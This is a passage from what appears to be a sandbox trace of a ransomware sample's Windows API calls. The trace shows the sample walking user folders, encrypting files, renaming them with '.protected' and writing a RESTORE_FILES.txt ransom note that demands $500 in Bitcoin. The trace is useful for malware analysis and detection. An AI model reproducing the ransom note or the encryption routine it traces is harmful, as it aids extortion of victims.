(lpString1="..", lpString2=".") returned 1 [0093.662] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.662] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.662] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.662] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.662] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\.." 
(normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.662] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.662] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0093.662] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0093.662] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0093.662] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0093.662] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0093.662] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 77 [0093.662] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0093.662] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0093.662] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.662] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.663] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 77 
[0093.663] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0093.666] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 77 [0093.666] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0093.666] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini") returned 77 [0093.666] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0093.667] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.667] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.667] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.667] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.668] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.668] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.668] CloseHandle (hObject=0x150) returned 1 [0093.668] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.protected") returned 87 [0093.673] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\desktop.ini.protected")) returned 1 [0093.673] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.673] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0093.673] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0093.673] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0093.673] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0093.673] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0093.674] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 75 [0093.674] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0093.674] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0093.674] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.674] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.674] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 75 [0093.674] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0093.674] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 75 [0093.674] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0093.674] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]") returned 75 [0093.674] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0093.674] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.674] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.674] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.674] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.675] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.675] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.675] CloseHandle (hObject=0x150) returned 1 [0093.675] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].protected") returned 85 [0093.675] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1].protected")) returned 1 [0093.676] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.676] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.676] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\RESTORE_FILES.txt") returned 83 [0093.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.810] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.810] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0093.811] lstrlenA (lpString="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") returned 684 [0093.811] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.811] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.811] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0093.811] CloseHandle (hObject=0x14c) returned 1 [0093.812] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.812] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0093.812] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0093.812] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0093.812] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0093.812] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0093.812] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 68 [0093.812] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0093.812] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0093.812] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.812] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.812] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 68 [0093.812] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0093.812] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 68 
[0093.812] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0093.812] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 68 [0093.812] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0093.812] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x43, lpOverlapped=0x0) returned 1 [0093.816] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.816] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x43, lpOverlapped=0x0) returned 1 [0093.816] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.816] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.816] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.816] CloseHandle (hObject=0x14c) returned 1 [0093.816] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.protected") returned 78 [0093.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), 
lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini.protected")) returned 1 [0093.817] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.817] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0093.817] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0093.817] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0093.817] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0093.817] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0093.817] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 66 [0093.817] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0093.817] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0093.817] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.818] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.818] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 66 [0093.818] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0093.818] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 66 [0093.818] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0093.818] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 66 [0093.819] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0093.819] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.833] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.833] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.833] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.833] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.834] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.834] CloseHandle (hObject=0x14c) returned 1 [0093.834] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.protected") returned 76 [0093.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: 
"c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat.protected")) returned 1 [0093.834] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.835] lstrcmpiW (lpString1="KQMHSVKD", lpString2="Windows") returned -1 [0093.835] lstrcmpiW (lpString1="KQMHSVKD", lpString2="Program Files") returned -1 [0093.835] lstrcmpiW (lpString1="KQMHSVKD", lpString2="Program Files (x86)") returned -1 [0093.835] lstrcmpiW (lpString1="KQMHSVKD", lpString2="$Recycle.bin") returned 1 [0093.835] lstrcmpiW (lpString1="KQMHSVKD", lpString2="System Volume Information") returned -1 [0093.835] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD") returned 65 [0093.835] lstrcmpW (lpString1="KQMHSVKD", lpString2=".") returned 1 [0093.835] lstrcmpW (lpString1="KQMHSVKD", lpString2="..") returned 1 [0093.835] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\*") returned 67 [0093.835] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.835] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.835] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.835] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.835] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.835] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.835] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\.") returned 67 [0093.835] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.835] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.835] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.835] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.835] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.835] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.835] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.835] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.836] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.836] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.836] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.836] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\..") returned 68 [0093.836] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.836] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.836] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.836] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.836] 
CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.836] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.836] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.836] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0093.836] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0093.836] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0093.836] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0093.836] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0093.836] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, 